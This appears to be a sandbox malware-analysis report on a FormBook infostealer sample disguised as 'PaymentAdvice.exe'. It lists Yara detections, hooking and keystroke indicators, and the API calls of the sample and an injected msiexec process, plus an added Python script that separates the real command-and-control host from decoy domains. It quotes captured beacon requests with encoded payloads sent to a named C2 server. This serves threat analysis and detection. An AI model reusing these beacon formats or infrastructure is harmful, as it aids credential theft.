Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard
Creates a DirectInput object (often for capturing keystrokes)
Source: PaymentAdvice.exe, 00000000.00000002.237618535.0000000000A9A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
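Every request in the Networking section has the same shape, GET /c22b/?GPi8=<payload>&ary=<id> with Connection: close and no User-Agent, and it goes to ten different hosts, yet the extracted configuration names only www.saturnkorp.net/c22b/ as the C2 and lists the other hosts under "decoy". FormBook beacons to the decoys alongside the real server so the operator infrastructure cannot be picked out of traffic alone; one side effect is visible above, where Avira labels the decoy www.abolishlawinforcement.com as malware. The following is an added example, not part of the Joe Sandbox report, that separates the two using the report's own configuration: it parses the extracted JSON and the captured request rows and labels each contacted host as c2, decoy or unknown. The decoy list is shortened to the hosts used, the request lines are reconstructed from the rows above, and the www.example-cdn.invalid request is a constructed control.

```python
import json
import re
from typing import Dict, List
from urllib.parse import urlsplit

# FormBook configuration as extracted in the report (C2 entry verbatim; the 64-entry
# decoy list is shortened to the hosts the sample requests below contact).
FORMBOOK_CONFIG = json.dumps({
    "C2 list": ["www.saturnkorp.net/c22b/"],
    "decoy": ["abolishlawinforcement.com", "webinast.com", "puebloregentseniorliving.com",
              "vtz6whu5254xb1.xyz", "sgdivergence.com", "unmanglement.com"],
})

# Constructed request lines: three copied from the report's "HTTP traffic detected"
# rows, plus one to a host in neither list (assumed) to show the unknown case.
HTTP_LINES = [
    "GET /c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m HTTP/1.1 Host: www.abolishlawinforcement.com Connection: close",
    "GET /c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m HTTP/1.1 Host: www.webinast.com Connection: close",
    "GET /c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m HTTP/1.1 Host: www.saturnkorp.net Connection: close",
    "GET /update/check HTTP/1.1 Host: www.example-cdn.invalid Connection: close",
]

REQUEST_RE = re.compile(r"^(GET|POST)\s+(\S+)\s+HTTP/1\.[01]\s+Host:\s*(\S+)", re.IGNORECASE)


def normalize_host(host: str) -> str:
    """Lower-case and drop a leading 'www.'; the config stores decoys without it,
    while the beacons on the wire carry it."""
    host = host.strip().lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def parse_config(config_json: str) -> Dict[str, object]:
    """Split each 'host/path/' C2 entry and normalise the decoy domains."""
    cfg = json.loads(config_json)
    c2 = []
    for entry in cfg.get("C2 list", []):
        host, _, path = entry.partition("/")
        c2.append((normalize_host(host), "/" + path))
    return {"c2": c2, "decoys": {normalize_host(d) for d in cfg.get("decoy", [])}}


def classify_requests(config_json: str, lines: List[str]) -> List[Dict[str, object]]:
    cfg = parse_config(config_json)
    c2_hosts = {h for h, _ in cfg["c2"]}
    c2_paths = {p for _, p in cfg["c2"]}
    results = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        method, uri, host = m.group(1).upper(), m.group(2), normalize_host(m.group(3))
        parts = urlsplit(uri)
        if host in c2_hosts:
            category = "c2"
        elif host in cfg["decoys"]:
            category = "decoy"
        else:
            category = "unknown"
        results.append({
            "host": host, "method": method, "path": parts.path, "category": category,
            # The campaign path (/c22b/) is shared by the real C2 and every decoy beacon,
            # so it identifies the campaign but never the server.
            "campaign_path": parts.path in c2_paths,
            "query_keys": [kv.split("=", 1)[0] for kv in parts.query.split("&") if kv],
        })
    return results


def real_c2_hosts(results: List[Dict[str, object]]) -> List[str]:
    """Only the hosts worth treating as operator infrastructure."""
    return sorted({str(r["host"]) for r in results if r["category"] == "c2"})


if __name__ == "__main__":
    for r in classify_requests(FORMBOOK_CONFIG, HTTP_LINES):
        print(f'{r["category"]:8} {r["host"]:35} {r["path"]} keys={r["query_keys"]}')
    print("C2:", real_c2_hosts(classify_requests(FORMBOOK_CONFIG, HTTP_LINES)))
```

For blocking and detection the distinction matters: the campaign path and query keys are good network signatures for the whole family (the Snort alerts above fire on exactly that shape, for the decoys too), but only the c2 host belongs in an infrastructure IOC set; pushing the 64 decoy domains out as "FormBook C2" pollutes reputation data in the way the Avira verdict above already shows.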

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: the same eight memory dumps (type: MEMORY) and six unpacked PEs (type: UNPACKEDPE) listed under AV Detection above

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)
          Source: PaymentAdvice.exe; Static file information: Suspicious name
          Initial sample is a PE file and has a suspicious name
          Source: initial sample; Static PE information: Filename: PaymentAdvice.exe
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_004181B0 NtCreateFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00418260 NtReadFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_004182E0 NtClose
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00418390 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_004181AB NtCreateFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00418202 NtReadFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_004182DA NtClose
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_0041838A NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A398F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A399A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A395D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A396E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A397A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A398A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39820 NtEnumerateKey
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A3B040 NtSuspendThread
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A399D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39950 NtQueueApcThread
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39A10 NtQuerySection
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A3A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39B00 NtSetValueKey
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A395F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A3AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39560 NtWriteFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A396D0 NtCreateKey
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39650 NtQueryValueKey
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A3A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39760 NtOpenProcess
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A39770 NtSetInformationFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_2_00A3A770 NtOpenThread
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_1_004181B0 NtCreateFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_1_00418260 NtReadFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_1_004182E0 NtClose
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_1_00418390 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_1_004181AB NtCreateFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_1_00418202 NtReadFile
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_1_004182DA NtClose
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 2_1_0041838A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_046795D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_046796E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_046796D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_046799A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679560 NtWriteFile
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_0467AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_046795F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679760 NtOpenProcess
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_0467A770 NtOpenThread
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_0467A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_046797A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_0467B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_046798F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_046798A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_046799D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679A20 NtResumeThread
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679A10 NtQuerySection
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_04679B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_0467A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_003981B0 NtCreateFile
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_00398260 NtReadFile
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_003982E0 NtClose
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_00398390 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_003981AB NtCreateFile
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_00398202 NtReadFile
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_003982DA NtClose
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 7_2_0039838A NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\PaymentAdvice.exe; Code function: 0_2_0040314A EntryPoint, #17, OleInitialize, SHGetFileInfoA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, DeleteFileA, GetCommandLineA, GetModuleHandleA, CharNextA, OleUninitialize, ExitProcess, lstrcatA, CreateDirectoryA, lstrcatA, lstrcatA, DeleteFileA, GetModuleFileNameA, lstrcmpiA, CopyFileA, lstrcatA, lstrcatA, lstrcatA, lstrcatA, CloseHandle, GetCurrentProcess, ExitWindowsEx, ExitProcess